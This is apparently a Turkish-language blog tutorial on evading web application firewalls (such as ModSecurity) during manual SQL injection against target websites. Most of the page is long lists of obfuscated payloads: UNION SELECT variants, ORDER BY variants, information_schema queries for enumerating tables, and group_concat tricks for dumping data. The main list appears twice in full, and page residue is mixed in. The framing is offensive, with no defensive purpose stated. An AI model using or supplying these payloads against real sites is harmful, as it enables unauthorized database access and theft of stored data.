Manuel Sql İnjection Waf Bypass (Konu Anlatımı)

Manuel Sql İnjection WAF Security Bypass

Manuel Sql İnjection Saldırılarında "union, select, order, by" Gibi İstismar Kodlamalarında Sürekli Karşımıza Çıkan 403, Mod Security Gibi Site Güvenlik Duvarı Hatalarını Nasıl Bypass Ederiz Bunu Öğreneceğiz.

Manuel Sql İnjection Nedir ?

Manuel Sql İnjection Sqlmap, Havij Gibi Programlardan Ziyade Site Üzerinden Manuel Payloadlar Denenerek Sitenin SQL Veri Tabanını Çeken İstismar Araçlarıdır. Bu Açıklar Genellikle Siteyi Oluşuturup Yazanların Kısaca Sitenin Yazılımını Yapanların Sql Veri Tabanında Bir Kodlama Hatası Yaptıklarından Kaynaklanır. Manuel Sql İnjection Avantajı İse Bazı Programlar İle Denenen Ataklardan Ziyade Manuel İle Başarı Şansı Daha Yüksektir.

Manuel Sql İnjcetion Waf Bypass

Hedef Sitemizi Bulduk Payloadlar İle İstismarlarımızı Yapıyoruz. Fakat Bir Hata Mesajı Aldık. Veya Kolonlar Yansımadı. Site Üzerinden Veya Hackbar Yardımı İle Şu Payloadları Yazalım.

Waf Union Select İçin



	%55nion(%53elect 1,2,3)-- -
	+union+distinct+select+
	+union+distinctROW+select+
	///!12345UNION SELECT///
	///!50000UNION SELECT///
	//UNION/*//!50000SELECT///*
	*/!50000UniON SeLeCt/*
	*union /!50000%53elect/*
	+#uNiOn+#sEleCt
	+#1q%0AuNiOn all#qa%0A#%0AsEleCt
	*/!%55NiOn/ /!%53eLEct/*
	*/!u%6eion/ /!se%6cect/*
	+un//ion+se//lect
	uni%0bon+se%0blect
	%2f%2funion%2f%2fselect
	*union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A*
	REVERSE(noinu)+REVERSE(tceles)
	*/--/union/--/select/--/*
	*union (/!/*/ SeleCT / 1,2,3)**
	*/!union/+/!select/*
	*union+/!select/*
	//union//select//**
	//uNIon//sEleCt//**
	+%2F/+Union/!select/**
	///!union//*//!select///*
	*/!uNIOn/ /!SelECt/*
	+union+distinct+select+
	+union+distinctROW+select+
	uNiOn aLl sElEcT
	UNIunionON+SELselectECT
	//union/!50000select///
	0%a0union%a0select%09
	%0Aunion%0Aselect%0A
	%55nion//%53elect**
	*uni<on all="" sel="">/!20000%0d%0aunion/+/!20000%0d%0aSelEct/*
	*%252f%252a/UNION%252f%252a /SELECT%252f%252a/*
	%0A%09UNION%0CSELECT%10NULL%
	*/!union//--//!all//--//!select/*
	*union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A1% 2C2%2C*
	*/!20000%0d%0aunion/+/!20000%0d%0aSelEct/*
	*+UnIoN/&a=/SeLeCT/&a=/*
	union+sel%0bect
	*+union+select+*
	+#1q%0Aunion all#qa%0A#%0Aselect
	union(select (1),(2),(3),(4),(5))
	UNION(SELECT(column)FROM(table))
	%23xyz%0AUnIOn%23xyz%0ASeLecT+
	%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
	union(select(1),2,3)
	union (select 1111,2222,3333)
	*uNioN (/!/*/ SeleCT / 11)**
	union (select 1111,2222,3333)
	+#1q%0AuNiOn all#qa%0A#%0AsEleCt
	///U//n//I//o//N//S//e//L//e//c//T/**
	%0A///!50000%55nIOn//yoyu/all/*/%0A/!%53eLEct/%0A/nnaa/*
	+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
	*+union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A1% 2C2%2C*
	*/!f***U%0d%0aunion/+/!f**U%0d%0aSelEct/**
	+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
	*/!blobblobblob%0d%0aunion/+/!blobblobblob%0d%0aSelEct/*
	/union\sselect/g
	/union\s+select/i
	*/!UnIoN/SeLeCT*
	*+UnIoN/&a=/SeLeCT/&a=/*
	+uni>on+sel>ect+
	+(UnIoN)+(SelECT)+
	+(UnI)(oN)+(SeL)(EcT)
	+’UnI”On’+'SeL”ECT’
	+uni on+sel ect+
	*+/!UnIoN/+/!SeLeCt/+*
	*/!u%6eion/ /!se%6cect/*
	*uni%20union%20/!select/%20*
	union%23aa%0Aselect
	//union/!50000select/**
	*/^.union.$/ /^.select.$/*
	*/union/union/select/select+*
	*/uni X on/union/sel X ect/*
	+un//ion+sel//ect+
	+UnIOn%0d%0aSeleCt%0d%0a
	*UNION/&test=1/SELECT/&pwn=2/*
	un?<ion sel="">+un//ion+se//lect+
	+UNunionION+SEselectLECT+
	+uni%0bon+se%0blect+
	*%252f%252a/union%252f%252a /select%252f%252a/*
	/%2A%2A/union/%2A%2A/select/%2A%2A/
	%2f%2funion%2f%2fselect%2f%2f**
	*union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A*
	*/!UnIoN/SeLecT+*

Waf Order By İçin

/*!order*/+/*!by*/

/*!ORDER BY*/

/*!50000ORDER BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/

Waf İnformation Schema Tables İçin

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -

/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

WAF Group Concat İçin

	gRoUp_cOnCAt()
	*group_concat(/!/)*
	*group_concat(/!12345table_name/)*
	*group_concat(/!50000table_name/)*
	*/!group_concat/(/!12345table_name/)*
	*/!group_concat/(/!50000table_name/)*
	*/!12345group_concat/(/!12345table_name/)*
	*/!50000group_concat/(/!50000table_name/)*
	*/!GrOuP_ConCaT/()*
	*/!12345GroUP_ConCat/()*
	*/!50000gRouP_cOnCaT/()*
	*/!50000Gr%6fuP_c%6fnCAT/()*
	unhex(hex(group_concat(table_name)))
	*unhex(hex(/!group_concat/(/!table_name/)))*
	*unhex(hex(/!12345group_concat/(table_name)))*
	*unhex(hex(/!12345group_concat/(/!table_name/)))*
	*unhex(hex(/!12345group_concat/(/!12345table_name/)))*
	*unhex(hex(/!50000group_concat/(table_name)))*
	*unhex(hex(/!50000group_concat/(/!table_name/)))*
	*unhex(hex(/!50000group_concat/(/!50000table_name/)))*
	convert(group_concat(table_name)+using+ascii)
	*convert(group_concat(/!table_name/)+using+ascii)*
	*convert(group_concat(/!12345table_name/)+using+ascii)*
	*convert(group_concat(/!50000table_name/)+using+ascii)*
	CONVERT(group_concat(table_name)+USING+latin1)
	CONVERT(group_concat(table_name)+USING+latin2)
	CONVERT(group_concat(table_name)+USING+latin3)
	CONVERT(group_concat(table_name)+USING+latin4)
	CONVERT(group_concat(table_name)+USING+latin5) ALAKALI VİDEO



	%55nion(%53elect 1,2,3)-- -
	+union+distinct+select+
	+union+distinctROW+select+
	///!12345UNION SELECT///
	///!50000UNION SELECT///
	//UNION/*//!50000SELECT///*
	*/!50000UniON SeLeCt/*
	*union /!50000%53elect/*
	+#uNiOn+#sEleCt
	+#1q%0AuNiOn all#qa%0A#%0AsEleCt
	*/!%55NiOn/ /!%53eLEct/*
	*/!u%6eion/ /!se%6cect/*
	+un//ion+se//lect
	uni%0bon+se%0blect
	%2f%2funion%2f%2fselect
	*union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A*
	REVERSE(noinu)+REVERSE(tceles)
	*/--/union/--/select/--/*
	*union (/!/*/ SeleCT / 1,2,3)**
	*/!union/+/!select/*
	*union+/!select/*
	//union//select//**
	//uNIon//sEleCt//**
	+%2F/+Union/!select/**
	///!union//*//!select///*
	*/!uNIOn/ /!SelECt/*
	+union+distinct+select+
	+union+distinctROW+select+
	uNiOn aLl sElEcT
	UNIunionON+SELselectECT
	//union/!50000select///
	0%a0union%a0select%09
	%0Aunion%0Aselect%0A
	%55nion//%53elect**
	*uni<on all="" sel="">/!20000%0d%0aunion/+/!20000%0d%0aSelEct/*
	*%252f%252a/UNION%252f%252a /SELECT%252f%252a/*
	%0A%09UNION%0CSELECT%10NULL%
	*/!union//--//!all//--//!select/*
	*union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A1% 2C2%2C*
	*/!20000%0d%0aunion/+/!20000%0d%0aSelEct/*
	*+UnIoN/&a=/SeLeCT/&a=/*
	union+sel%0bect
	*+union+select+*
	+#1q%0Aunion all#qa%0A#%0Aselect
	union(select (1),(2),(3),(4),(5))
	UNION(SELECT(column)FROM(table))
	%23xyz%0AUnIOn%23xyz%0ASeLecT+
	%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
	union(select(1),2,3)
	union (select 1111,2222,3333)
	*uNioN (/!/*/ SeleCT / 11)**
	union (select 1111,2222,3333)
	+#1q%0AuNiOn all#qa%0A#%0AsEleCt
	///U//n//I//o//N//S//e//L//e//c//T/**
	%0A///!50000%55nIOn//yoyu/all/*/%0A/!%53eLEct/%0A/nnaa/*
	+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
	*+union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A1% 2C2%2C*
	*/!f***U%0d%0aunion/+/!f**U%0d%0aSelEct/**
	+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
	*/!blobblobblob%0d%0aunion/+/!blobblobblob%0d%0aSelEct/*
	/union\sselect/g
	/union\s+select/i
	*/!UnIoN/SeLeCT*
	*+UnIoN/&a=/SeLeCT/&a=/*
	+uni>on+sel>ect+
	+(UnIoN)+(SelECT)+
	+(UnI)(oN)+(SeL)(EcT)
	+’UnI”On’+'SeL”ECT’
	+uni on+sel ect+
	*+/!UnIoN/+/!SeLeCt/+*
	*/!u%6eion/ /!se%6cect/*
	*uni%20union%20/!select/%20*
	union%23aa%0Aselect
	//union/!50000select/**
	*/^.union.$/ /^.select.$/*
	*/union/union/select/select+*
	*/uni X on/union/sel X ect/*
	+un//ion+sel//ect+
	+UnIOn%0d%0aSeleCt%0d%0a
	*UNION/&test=1/SELECT/&pwn=2/*
	un?<ion sel="">+un//ion+se//lect+
	+UNunionION+SEselectLECT+
	+uni%0bon+se%0blect+
	*%252f%252a/union%252f%252a /select%252f%252a/*
	/%2A%2A/union/%2A%2A/select/%2A%2A/
	%2f%2funion%2f%2fselect%2f%2f**
	*union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A*
	*/!UnIoN/SeLecT+*

Manuel Sql İnjection Waf Bypass (Konu Anlatımı)

Manuel Sql İnjection WAF Security Bypass

Manuel Sql İnjection Nedir ?

Manuel Sql İnjcetion Waf Bypass

Waf Union Select İçin

ALAKALI VİDEO

Yorum Gönder

lnstagram Hesap Kapatma Methodu (KANITLI)

نموذج الاتصال


	*/!order/+/!by/*
	*/!ORDER BY/*
	*/!50000ORDER BY/*
	*/!50000ORDER////!50000BY/*
	*/!12345ORDER/+/!BY/*